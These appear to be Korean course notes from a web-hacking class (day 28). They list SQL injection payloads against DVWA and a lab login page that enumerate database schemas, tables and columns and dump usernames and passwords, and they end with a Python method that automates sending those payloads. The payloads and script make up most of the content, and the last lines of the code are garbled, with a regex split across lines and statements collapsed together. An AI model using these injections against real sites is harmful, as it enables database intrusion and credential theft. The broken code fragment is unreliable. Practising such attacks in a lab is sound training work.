28일차

28일차

그누보드와 dvwa의 업로드를 활용해서
업로드 페이지 구현
파일을 암호화해 보자


SQL 인젝션 공격해 보기

select from
select * from users;
select idx,id_param from users;
select id_param from users where id_param='admin';
1' or '1'='1
admin' or '1'='1

insert into
update set
delete from

1' or '1'='1
1' UNION SELECT name,pw from users#
1' UNION SELECT 1,2#
1' ORDER BY 1#
' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='dvwa'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='dvwa' and table_name='users'#
' UNION SELECT user,password from users#

md5 자동화 프로그램 만들기

웹 공격 SQL
request
response
' UNION SELECT schema_name,2 from information_schema.schemata#
' UNION SELECT table_name,2 from information_schema.tables where table_schema='web2'#
' UNION SELECT column_name,2 from information_schema.columns where table_schema='web2' and table_name='users'#
' UNION SELECT id_param,pw_param from users#
' UNION SELECT pw_param,id_param from users#
업로드 공격

    def sql(self):
        """Send a fixed list of SQL injection test strings to the lab login endpoint and report the responses.

        Each string in ``sql_in`` is POSTed to ``target`` as both ``id_param`` and
        ``pw_param``. A response body exactly equal to ``"OK"`` is reported as
        ``SQL OK``; otherwise a regex is applied to pull out text following ``OK``.

        Relies on ``requests`` and ``re`` being imported by the enclosing module
        (the imports are not visible in this fragment). ``self`` is not read.
        The ``result`` list is assigned but never appended to or returned in the
        visible code.
        """
        result=[]
        # Lab login handler used for this exercise; the same page records the payloads below.
        target="http://web2.st.kr/auth/login2_ok.php"
        sql_in=["1' or '1'='1","' UNION SELECT schema_name,2 from information_schema.schemata#","' UNION SELECT table_name,2 from information_schema.tables where table_schema='web2'#","' UNION SELECT column_name,2 from information_schema.columns where table_schema='web2' and table_name='users'#","' UNION SELECT id_param,pw_param from users#","' UNION SELECT pw_param,id_param from users#"]
        for sql in sql_in:
            # Same string is placed in both form fields for every request.
            payload={"id_param":sql,"pw_param":sql}
           # print(sql)
            response=requests.post(target, data=payload)
           # print(response.text)#
            # Exact whole-body comparison: any surrounding whitespace or markup makes this False.
            if(response.text == "OK"):
                print("SQL OK")
            # NOTE(review): the regex literal below is split across three physical lines and the
            # statements after it are collapsed onto one line. This looks like an extraction artifact
            # (markup between "OK" and the capture group was probably stripped) — confirm against the
            # original source file before relying on this fragment.
            matches = re.search(r'OK[\s]*
(.*?)
', response.text, re.DOTALL) if matches: result_text = matches.group(1) print("OK:", result_text) else: print("No OK tags found.")